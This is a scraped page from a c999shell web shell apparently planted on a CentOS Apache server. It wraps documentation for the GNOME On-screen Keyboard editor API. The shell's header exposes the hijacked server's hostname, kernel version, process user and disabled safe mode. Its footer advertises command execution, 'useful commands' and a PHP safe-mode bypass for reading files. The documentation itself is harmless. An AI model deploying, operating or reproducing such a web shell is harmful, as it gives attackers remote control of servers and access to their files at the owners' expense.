Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/gok/ drwxr-xr-x |
Viewing file: gok-gok-editor.html (18.06 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Synopsisvoid gok_editor_run (void); void gok_editor_close (void); void gok_editor_on_exit (void); void gok_editor_new (void); void gok_editor_open_file (void); void gok_editor_new_file (void); void gok_editor_touch_file (gboolean modified); void gok_editor_show_parameters (GokKey *pKey); void gok_editor_next_key (void); void gok_editor_previous_key (void); void gok_editor_add_key (void); void gok_editor_delete_key (void); void gok_editor_duplicate_key (void); void gok_editor_update_key (void); void gok_editor_update_keyboard (GokKeyboard *pKeyboard); gboolean on_editor_keyboard_delete_event (GtkWidget *widget, GdkEvent *event, gpointer user_data); void gok_editor_keyboard_key_press (GtkWidget *pWidget); gboolean gok_editor_save_current_keyboard (void); gboolean gok_editor_save_current_keyboard_as (void); gboolean gok_editor_save_keyboard (GokKeyboard *pKeyboard, gchar *Filename); gboolean gok_editor_print_outputs (FILE *pFile, GokOutput *pOutput, gboolean bWrapper); gboolean gok_editor_validate_keyboard (GokKeyboard *pKeyboard); void gok_editor_message_filename_bad (gchar *Filename); void gok_editor_update_title (void); Detailsgok_editor_on_exit ()void gok_editor_on_exit (void); The menu item to close the program has been selected so close it.
gok_editor_open_file ()void gok_editor_open_file (void); Opens an existing keyboard file for editing.
gok_editor_touch_file ()void gok_editor_touch_file (gboolean modified); Marks the file as having modifications (or not)
gok_editor_show_parameters ()void gok_editor_show_parameters (GokKey *pKey); Displays the parameters for the given key on the editor dialog.
gok_editor_next_key ()void gok_editor_next_key (void); Display parameters for the next key on the keyboard.
gok_editor_duplicate_key ()void gok_editor_duplicate_key (void); Add a copy of the currently selected key.
gok_editor_update_keyboard ()void gok_editor_update_keyboard (GokKeyboard *pKeyboard); update the display of the keyboard and recalculate rows and columns
on_editor_keyboard_delete_event ()gboolean on_editor_keyboard_delete_event (GtkWidget *widget, GdkEvent *event, gpointer user_data); Prevents the keyboard window from closing.
gok_editor_keyboard_key_press ()void gok_editor_keyboard_key_press (GtkWidget *pWidget); The user has just pressed a key on the keyboard.
gok_editor_save_current_keyboard ()gboolean gok_editor_save_current_keyboard (void); Saves the current keyboard back to its original file.
gok_editor_save_current_keyboard_as ()gboolean gok_editor_save_current_keyboard_as (void); Saves the current keyboard under a new filename.
gok_editor_save_keyboard ()gboolean gok_editor_save_keyboard (GokKeyboard *pKeyboard, gchar *Filename); Saves the given keyboard to the given file.
gok_editor_print_outputs ()gboolean gok_editor_print_outputs (FILE *pFile, GokOutput *pOutput, gboolean bWrapper); Prints the outputs in XML format to the given file.
gok_editor_validate_keyboard ()gboolean gok_editor_validate_keyboard (GokKeyboard *pKeyboard); Validates the current keyboard to make sure it is OK.
gok_editor_message_filename_bad ()void gok_editor_message_filename_bad (gchar *Filename); Inform the user that the selected file name is not a valid GOK keyboard file name.
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0117 ]-- |